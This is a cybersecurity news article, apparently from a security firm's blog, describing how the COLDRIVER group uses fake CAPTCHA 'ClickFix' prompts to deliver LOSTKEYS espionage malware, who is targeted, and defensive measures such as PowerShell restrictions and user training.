On the front lines of the ever-evolving cyber threat landscape, Russian-linked hacking group COLDRIVER, also known as Star Blizzard, Callisto, and UNC4057, has introduced a new malware strain dubbed LOSTKEYS. This espionage-focused malware is deployed using a clever social engineering technique called ClickFix – a fake CAPTCHA prompt that tricks users into executing malicious commands on their own systems.
The Rise of ClickFix: How Hackers Bypass Human Caution
ClickFix is a social engineering trick designed to look like a harmless CAPTCHA check. When victims land on a decoy website, they are asked to complete a CAPTCHA verification. However, this is no ordinary security check. Instead of a typical verification, users are instructed to open the Windows Run dialog and paste a pre-copied PowerShell command. This simple action initiates a multi-stage infection process that delivers the LOSTKEYS malware onto the victim’s device.
What makes this particularly dangerous is that the fake CAPTCHA prompt can bypass the victim’s cautiousness, which most people associate with harmless security steps. This method allows the malware to slip past traditional defenses, leveraging human error to gain access to sensitive systems.
This fake Russian CAPTCHA prompt has been spotted targeting high-profile officials. Google’s Threat Intelligence Group (GTIG) reported that COLDRIVER uses this technique to infiltrate systems of NATO officials, Western diplomats, and non-governmental organizations (NGOs). In some cases, individuals connected to Ukraine have also been targeted, reflecting COLDRIVER’s alignment with Russia’s strategic intelligence objectives.
Who Is Being Targeted?
According to GTIG, the primary targets of LOSTKEYS are advisors to Western governments and militaries, journalists, think tanks, NGOs, and individuals connected to Ukraine. The attacks were observed in January, March, and April of 2025, marking an aggressive expansion of COLDRIVER’s espionage efforts.
The targeting of individuals connected to Ukraine underscores Russia’s strategic goals, which include intelligence gathering on political and military strategies. Western diplomats and government advisors are particularly attractive targets due to their access to confidential discussions and planning documents. This highlights a broader trend of state-sponsored cyber espionage being used as a tool for political leverage.
Moreover, COLDRIVER’s selective targeting has made these attack campaigns highly effective. By focusing on systems that store critical geopolitical information, the malware’s payload can yield maximum value for Russia’s intelligence services. The targeting of journalists, think tanks, and NGO personnel also suggests that the group seeks to control narratives and gather sensitive reports related to international relations and security.
How ClickFix Works to Deploy LOSTKEYS
The ClickFix technique is a sophisticated form of social engineering designed to trick users into executing malicious code on their own devices without realizing it. Here’s how it works:
Decoy Website Setup: Hackers set up a fake website that looks legitimate. When visitors land on this site, they are greeted with a CAPTCHA verification prompt, similar to those used by many websites. However, this CAPTCHA is a trap, designed to deceive the victim into executing the next steps.
The Fake CAPTCHA Trick: Instead of performing a real CAPTCHA check, the page instructs the user to open the Windows Run dialog (Win + R) and paste a command that has been copied to their clipboard. The prompt may seem official, and the instructions appear harmless. The simplicity of the task makes it more likely that the user will comply without suspecting anything malicious.
PowerShell Command Execution: Once the user pastes and executes the copied PowerShell script, it connects to a remote server controlled by the hackers. This server then pushes the next stage of the malware to the victim’s device. The use of PowerShell allows the malware to bypass conventional security measures, leveraging its powerful scripting capabilities to execute complex payloads without triggering alarms.
Multi-Stage Infection Process: The PowerShell command initiates a multi-stage infection process that delivers the LOSTKEYS malware to the victim’s system. This malware is specifically designed to look for and target sensitive files. It scans for specific types of documents, such as .docx, .pdf, .xlsx, and .eml, which could contain confidential information, such as government reports, emails, and personal communications.
Data Exfiltration: Once the malware finds valuable files, it exfiltrates them to COLDRIVER’s remote servers for further analysis and exploitation. The process is designed to be covert, evading detection by traditional antivirus or intrusion detection systems. By the time victims realize their systems have been compromised, the data may already have been stolen and exploited.
Why This Is Dangerous
The reason ClickFix is so effective lies in its simplicity and the vulnerability it exploits: human error. CAPTCHA checks are commonplace, and most users don’t think twice before completing them. By presenting the task of copying and pasting a command as a simple step, hackers easily exploit this trust.
Additionally, the LOSTKEYS malware itself is highly effective in carrying out its espionage goals. The malware can operate quietly in the background, stealing valuable data without leaving a noticeable trace. This stealthiness makes detection difficult for the victim until it’s too late, and by then, sensitive data could already be in the hands of the attackers.
The rising sophistication of such social engineering tactics underlines the growing threat of cyber espionage. The ClickFix trick takes advantage of the user’s willingness to trust what appears to be a simple, benign task, making it particularly dangerous.
Preventive Measures and Solutions to Protect Against the LOSTKEYS Malware Attack
While the attack method is sophisticated, there are steps that individuals and organizations can take to minimize the risk of falling victim to it.
User Education and Awareness: Regularly train users to be cautious about unsolicited requests to execute commands or enter sensitive information. Encourage them to verify any unusual request before taking action.
Enable Multi-Factor Authentication (MFA): MFA adds an additional layer of protection to sensitive accounts, making it harder for hackers to gain unauthorized access.
PowerShell Restrictions: Restrict or disable PowerShell scripting on systems where it’s not required. This can significantly limit the attacker’s ability to execute malicious code via PowerShell.
Real-Time Monitoring and Threat Detection: Implement advanced threat detection systems that can detect unusual activities, such as unauthorized script execution or data exfiltration attempts.
Web Filtering: Use web filtering tools to block known malicious websites and prevent users from visiting sites that could host the fake CAPTCHA prompts.
Conclusion
COLDRIVER’s use of the ClickFix trick in deploying the LOSTKEYS malware marks a new chapter in cyber espionage. By using a fake CAPTCHA prompt, the group can trick users into executing malicious code that allows them to steal sensitive data. This multi-stage infection process highlights the increasing sophistication of cyberattacks aimed at high-profile individuals and organizations with access to valuable geopolitical intelligence.
As cyber threats evolve, it’s crucial for both individuals and organizations to prioritize cybersecurity awareness and defense systems. Proactive measures like user education, MFA, and real-time threat detection can help mitigate the risks of falling victim to these types of attacks. The growing reliance on digital platforms makes it more important than ever to be vigilant and prepared.
Did you find this article helpful? Follow us on Twitter (@hoploninfosec) and LinkedIn (Hoplon InfoSec) for more Cyber Security news and updates. Stay connected on Facebook and Instagram as well. At Hoplon Infosec, we’re committed to securing your digital world.
Learn More: Fake CAPTCHAs are being used to spread malware
